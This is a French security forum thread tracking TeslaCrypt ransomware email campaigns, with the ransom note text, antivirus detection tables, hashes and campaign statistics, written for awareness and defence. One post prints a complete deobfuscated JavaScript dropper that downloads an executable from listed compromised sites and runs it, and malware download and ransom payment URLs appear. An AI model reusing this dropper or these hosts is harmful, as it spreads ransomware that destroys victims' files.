Mail malicieux : TeslaCrypt Ransomware (virus RSA 4096)

[Malekal_morte]

Le tristement célèbre Ransomware TeslaCrypt (aka Virus RSA 4096) fait un retour en modifiant l'extensions des fichiers en .jpg (l'extension utilisée change régulièrement).

Cette variante de TestlaCrypt - Virus RSA 4096 revient avec une méthode de chiffrement (cryptage) bien plus robuste depuis Janvier qui ne permet plus de récupérer les documents.

Notre dossier sur les rançongiciels chiffreurs de fichiers

Avril 2016, un nouveau "Virurs RSA-4096" dit Ransomware RSA-4096 - CryptXXX qui reprend les fichiers intructions de TeslaCrypt et peut semer la confusion.
La page suivant décrit les différentes entre ces deux familles : Les virus RSA-4096

~~

Historique de la campagne ransomware RSA-4096 (variante TeslaCrypt)

Rendez-vous sur la fiche TeslaCrypt : Fiche TeslaCrypt.

Récapitulatif des campagnes TeslaCrypt Décembre 2015 :
how_recover : TeslaCrypt extension .vvv.

L'activité de TeslaCrypt sur abuse.ch :



Se protéger des scripts malicieux sur Windows permet d'empếcher l'installation du ransomware TeslaCrypt comme le montre cette vidéo avec le Ransomware Locky, le principe reste le même :



Schéma d'une campagne email malicieux TeslaCrypt (source threatpost.com :



Liens externes relatifs au ransomware TeslaCrypt (Virus RSA-4096)

Liens de désinfection ransomware TeslaCrypt variante RSA-4096 - extensions .vvv :

• Ransomware extension .vvv (supprimer-virus.com)
• Supprimer Ransomware documents extension .vvv (supprimer-trojan.com)

Récupération des fichiers .vvv

Se reporter à la procédure : Décrypter/récupérer les fichiers en extension .vvv.





La récupération des fichiers avec les extensions .jpg est impossible.

Conseils et sécurité

Les conseils de sécurité en lien avec les ransomwares :

• Virus par Email : Ce qu’il faut savoir pour les éviter
• Comment se protéger des scripts malicieux
• Les WebExploit

Comment sécuriser mon Windows[/list]

Limiter la portée des scripts malicieux avec marmiton :

[Malekal_morte]

Exemple d'images chiffrées avec la fameuse d'extensions .ccc de TeslaCrypt :



et les instructions HOW_TO_RESTORE_FILES :



HOW_TO_RESTORE_FILES en image :



HOW_TO_RESTORE_FILES au formate texte :



Le contenu des instructions HOW_TO_RESTORE_FILES au format Texte :

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
What happened to your files ?
All of your files were protected by a strong encryption with RSA-2048.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.

How did this happen ?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

What do I do ?
____________________________________________________________________________________________________________________________________________
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
____________________________________________________________________________________________________________________________________________

For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1. http://hfy28djd6dh.rg7hdts4d2sjfy.com/1717617A27149ED
2. http://fg347djvb.poin84mdgu9e.com/1717617A27149ED
3. https://3st7uyjfocyourll.onion.to/1717617A27149ED

If for some reasons the addresses are not available, follow these steps:
1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2. After a successful installation, run the browser and wait for initialization.
3. Type in the address bar: 3st7uyjfocyourll.onion/1717617A27149ED
4. Follow the instructions on the site.

IMPORTANT INFORMATION:
Your personal pages:
http://hfy28djd6dh.rg7hdts4d2sjfy.com/1717617A27149ED
http://fg347djvb.poin84mdgu9e.com/1717617A27149ED
https://3st7uyjfocyourll.onion.to/1717617A27149ED
Your personal page (using TOR): 3st7uyjfocyourll.onion/1717617A27149ED
Your personal identification number (if you open the site (or TOR 's) directly): 1717617A27149ED

HOW_TO_RESTORE_FILES se lance au démarrage, car dans le dossier démarrage (Menu Démarrer / Tous les programmes / Démarrage) :



La détection du sample observé :

SHA256: eed0eed86632ea74289e4ab2fccd0dcb27b5a9b754a7f6fc23287720cb7c38bd
Nom du fichier : bbhiy-a.exe
Ratio de détection : 31 / 54
Date d'analyse : 2015-11-09 17:52:00 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
ALYac Trojan.GenericKD.2852538 20151109
AVG Crypt5.KBN 20151109
AVware Trojan.Win32.Generic!BT 20151109
AhnLab-V3 Win-Trojan/Malpacked6.Gen 20151109
Arcabit Trojan.Generic.D2B86BA 20151109
Avast Win32:Malware-gen 20151109
Avira TR/Crypt.ZPACK.203958 20151109
Baidu-International Trojan.Win32.Filecoder.EM 20151109
BitDefender Trojan.GenericKD.2852538 20151109
DrWeb Trojan.Encoder.2883 20151109
ESET-NOD32 Win32/Filecoder.EM 20151109
Emsisoft Trojan.GenericKD.2852538 (B) 20151109
F-Secure Trojan.GenericKD.2852538 20151109
Fortinet W32/Filecoder.EM!tr 20151109
GData Trojan.GenericKD.2852538 20151109
Ikarus Trojan.Win32.Filecoder 20151109
K7AntiVirus Trojan ( 004b56ff1 ) 20151109
K7GW Trojan ( 004b56ff1 ) 20151109
Kaspersky UDS:DangerousObject.Multi.Generic 20151109
Malwarebytes Ransom.TeslaCrypt 20151109
McAfee GenericR-EZE!2E7F7CC9A815 20151109
McAfee-GW-Edition Artemis!Trojan 20151109
MicroWorld-eScan Trojan.GenericKD.2852538 20151109
Microsoft Ransom:Win32/Tescrypt!rfn 20151109
NANO-Antivirus Trojan.Win32.Encoder.dyntfa 20151109
Panda Trj/Genetic.gen 20151109
Sophos Mal/Generic-S 20151109
Symantec Trojan.Gen 20151109
Tencent Win32.Trojan.Inject.Auto 20151109
VIPRE Trojan.Win32.Generic!BT 20151109
nProtect Trojan.GenericKD.2852538 20151109

[Spci@list]

Bonjour,

J'ai lu attentivement les infos sur TeslaCrypt et j'ai malheureusement lu que le décryptage était impossible !
Est ce définitif ou il y a t il un espoir ?

J'ai un PC portable infecté par ce ransomware, tout est crypté en .ccc

Je souhaitais juste préciser que j'ai découvert dans l'arborescence des répertoire utilisateur un fichier nommé "recover_file_asuplxxty " qui contient une suite de caractères alphanumériques.

Ce fichier peut il être utile à quelque chose pour décrypter, est ce une clé (comme les .dat) ?

A qui puis je transmettre ce fichier et des exemple de fichiers cryptés pour analyser la situation ?

Merci de vos éclaircissements si vous en avez.

[Malekal_morte]

De l'espoir il y en a toujours mais à ce jour, clairement, il n'y a pas de solution.

[Malekal_morte]

Sur le forum quelques sujets concernant des infections Ransomwares.



Reçu aujourd'hui, email malicieux
Simplement avec un fichier part1.zip



Ce dernier renferme un bout de code JavaScript... remarquez, ça change des VBS.

J'en profite pour vous indiquer la lecture du billet Raise of the javascript droppers concernant l'émergence de ces derniers, même si ce n'est pas vraiment nouveau puisque des campagnes d'emails malicieux de rogues en utilisaient déjà, comme Malware Defender par exemple.



La détection :

SHA256: e7ee4be1ef81144f07e9bb4884f34ce8456aaaa1bec900f63b63864fed7c61a3
Nom du fichier : part1.js
Ratio de détection : 7 / 55

Antivirus Résultat Mise à jour
AVG JS/Downloader.Agent 20151203
BitDefender JS:Trojan.Script.CQX 20151203
Emsisoft JS:Trojan.Script.CQX (B) 20151203
GData JS:Trojan.Script.CQX 20151203
Kaspersky HEUR:Exploit.Script.Generic 20151203
McAfee-GW-Edition BehavesLike.JS.ExploitBlacole.xv 20151203
MicroWorld-eScan JS:Trojan.Script.CQX 20151203

Les URLs malicieuses ne sont pas difficiles à obtenir :

Code : Tout sélectionner

var b = "bfcaterers.com/wp-includes/certificates/73.exe? baneyconstruction.com/kldf/cachec50da2243ebb9d634cfad3427cafcc61/73.exe? 74.117.183.84/73.exe? betterhealth4us.com/wp-includes/fonts/73.exe?".split(" ");

var sdf =((1/*s147414895596n214096uM354193eOiZ*/)?"WScri":"")+"pt.Shell";
var ws = WScript.CreateObject(sdf);
var fd = "%TEMP%\\";
var fn = ws.ExpandEnvironmentStrings(fd);
var bim = "2.XMLH";
var poh = bim + "TTP";
var as = true  , sdfs = "ADOD";
var xo = WScript.CreateObject("MS"+"XML"+(727162, poh));
var xa = WScript.CreateObject(sdfs + "B.St"+(260558, "ream"));
var ld = 0;
var n = 1;

for (var i=ld; i<b.length; i++)  {
  var dn = 0;
  try  {
	poi = "GET";	 
    xo.open(poi,"http://"+b[i]+n, false); xo.send(); if (xo.status == 100+100)  {
      xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 201000-1000)  {
        dn = 1; xa.position = 0; xa.saveToFile/*d695247s*/(fn/*d494620s*/+n+".exe",4-2); try  {
          if (((new Date())>0,7547904888)) {
		    ws./*d692786s*/Run(fn+n+/*d829530s*/".exe",/*d702073s*/3-2,0); 
		    break;
          }
		}
        catch (er)  {
		}; 
      }; xa.close(); 
    }; 
	if (dn == 1)  {
      ld = i; break; 
    }; 
  }
  catch (er)  { 
  }; 
}; 

Le fichier téléchargé appartient à la famille des "Trojan.Crypto".

SHA256: b43eb03c3df9db7399d108a19101f8541c4e905c20cd634927796c02da6fbc16
Nom du fichier : engcm-a.exe
Ratio de détection : 5 / 54

Antivirus Résultat Mise à jour
Avast Win32:Malware-gen 20151203
Fortinet W32/CryptoLocker.CL!tr 20151203
Kaspersky UDS:DangerousObject.Multi.Generic 20151203
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151203
Tencent Win32.Trojan.Bp-ransomware.Ejqz 20151203

Celui-ci est une variante du rançongiciel chiffreur TestlaCrypt





On y voit nettement les fameuses extensions en .vvv

[Malekal_morte]

La campagne d'emails avec du JavaScript malicieux continue pour pousser le ransomware TestlaCrypt.





Une détection pour le Javascript.Downloader \o

SHA256: 2ff42cab271bd36b022f9c98290f2c2a5b6166d1fe77aeb4345165b9d4c72b88
Nom du fichier : doc_XB3XXw7JsWc.js
Ratio de détection : 1 / 54
Date d'analyse : 2015-12-04 10:25:23 UTC (il y a 1 minute)
at Mise à jour
DrWeb JS.DownLoader.570 20151204

et le dropper TestlaCrypt :

SHA256: bb1bc9d48333b6f42426b78a038bc514542848e43cb72183de723f2e532c2cf5
Nom du fichier : 73.exe
Ratio de détection : 5 / 55
Date d'analyse : 2015-12-04 10:10:26 UTC (il y a 21 minutes)

Antivirus Résultat Mise à jour
CMC Trojan.Win32.Swizzor.1!O 20151201
ESET-NOD32 a variant of Win32/Kryptik.EHDW 20151204
McAfee-GW-Edition BehavesLike.Win32.PackedAP.fh 20151204
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151204
Tencent Win32.Trojan.Bp-ransomware.Ejqz 20151204

[Malekal_morte]

Microsoft a ajouté TeslaCrypt au MSRT en Octobre. Bien sûr, ça ne changera pas grand chose car une fois que les fichiers ont été chiffrés Microsoft ne pourra rien faire pour vous, ils seront définitivement perdus.
=> http://blogs.technet.com/b/mmpc/archive ... crypt.aspx

Quelques chiffres sur la campagne TeslaCrypt

TeslaCrypt_propagation_MS.png

La répartition de la campagne TeslaCrypt par pays en septembre.
On note que la France est en 8e position derrière le Brésil.
Les pays anglo-saxons sont aussi fracassés, l'Italie aussi.

TeslaCrypt_propagation_repartition_pays.png

Dans l'ensemble, les ransomwares gagnent du terrain, il y a des tentatives d'introduction de ransomwares parmi les appareils mobiles et à plus long terme, il y a de fortes probabilités de voir émerger des ransomwares capables de paralyser nos objets connectés dans l'Internet des Objets (IdO).

[angelique]

Vu que L'idO ne se concentre pas et que les objets n'abordent pas suffisamment l'aspect sécurité, tu as parfaitement raison Mak ;) Qu'est-ce que ça va débouler dans moins de 6 mois \o

[Malekal_morte]

Les campagnes TeslaCrypt continuent :



Sur un sample, sur VirusTotal, on obtient :

HA256: e964c8dd0c93e00fed20b5c2dd30c515e8778a5bc9010e0dfe31380ae3e2e099
Nom du fichier : 86.exe?1
Ratio de détection : 5 / 54
Date d'analyse : 2015-12-09 15:34:22 UTC (il y a 1 minute)

Antivirus Résultat Mise à jour
AhnLab-V3 Win-Trojan/Teslacrypt.Gen 20151209
Bkav HW32.Packed.AA91 20151209
Kaspersky UDS:DangerousObject.Multi.Generic 20151209
McAfee-GW-Edition BehavesLike.Win32.Downloader.fh 20151209
Qihoo-360 HEUR/QVM20.1.Malware.Gen 20151209

sur l'URL :

URL: http://softextrain64.com/86.exe
Ratio de détection : 4 / 66
Date d'analyse : 2015-12-09 15:33:19 UTC (il y a 26 minutes)
Analyse de fichier : Allez à l'analyse du fichier téléchargé

URL Scanner Résultat
Sophos Malicious site
Websense ThreatSeeker Malicious site
Fortinet Malware site
Kaspersky Malware site

Là on se dit bouh les antivirus craignent...



Sauf qu'en réalité, par exemple, Avast! top le fichier en Win32:Evo-Gen [Susp]



Qu'en est-t-il de Microsoft Security Essentials qui dit avoir ajouté le malware dans son MSRT.
(voir édition au dessus).
Antivirus dont je ne ne suis pas très fan...

MSE ne bronche pas au lancement de l'exe...



qui continue à s'installer...



Un message avec les instructions s'affiche à la stupéfaction de la victime.

Microsoft Security Essentials (MSE) indique "État du PC : Protégé"


D'après Microsoft, "Votre PC est protégé et sous surveillance."
TeslaCrypt vient de terminer de chiffrer tous vos fichiers, ils sont désormais irrécupérables.

Security Alert - Infections rise spam campaign hits companies Europe

[Malekal_morte]

Les campagnes d'email malicieux continuent, depuis hier, ce sont aussi des fichiers Word malicieux qui sont envoyés en pièce jointe.

TeslaCrypt_campagne_Word_malicieux.png

La détection VirusTotal du dropper :

SHA256: e81173dd782598a3525c316e17cebe599dd4f60f2d4c8c28b73ddea43245bfb6
Nom du fichier : 97.exe
Ratio de détection : 8 / 54
Date d'analyse : 2015-12-16 17:57:28 UTC (il y a 1 minute)

Antiy-AVL Trojan/Win32.TSGeneric 20151216
ESET-NOD32 Win32/Filecoder.EM 20151216
Kaspersky UDS:DangerousObject.Multi.Generic 20151216
Malwarebytes Ransom.TeslaCrypt 20151216
McAfee-GW-Edition BehavesLike.Win32.PWSZbot.fh 20151216
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151216
Rising PE:Trojan.Kryptik!1.A31F [F] 20151216
Tencent Win32.Trojan.Bp-ransomware.Ejqz 20151216

[Malekal_morte]

ESET publie une étude sur la campagne de mails malicieux poussant le ransomware TeslaCrypt appelé JS/TrojanDownloader.Nemucod.

D'après les chiffres remontés, cette campagne représente plus de 10% des détections.
Le Japon est le pays le plus touché.
En Europe, l'Espagne et l'Italie sont en têtes.

trojan_JS_nemucod_grafica.png

trojan_JS_nemucod_grafica_2.png

Source :
http://www.welivesecurity.com/2015/12/1 ... und-world/

[Malekal_morte]

Les campagnes d'emails malicieux sont maintenant à l'arret.
La distribution de TeslaCrypt se fait maintenant à travers des Web Exploits (via Angler EK).
=> how_recover : TeslaCrypt extension .vvv.

et cela fonctionne :

[jljljl]

La procedure de decryptage des fichiers vvv est ici:
https://github.com/googulator/teslacrack

[Malekal_morte]

Merci,
Ca tourne depuis quelques heures sur la VM.
On verra ce que cela donne.

[Malekal_morte]

Je cherche des gens (il faut avoir un minimum de connaissances informatiques) pour tester une procédure de récupération de fichiers .vvv ( voir : http://forum.malekal.com/recuperation-f ... 53866.html )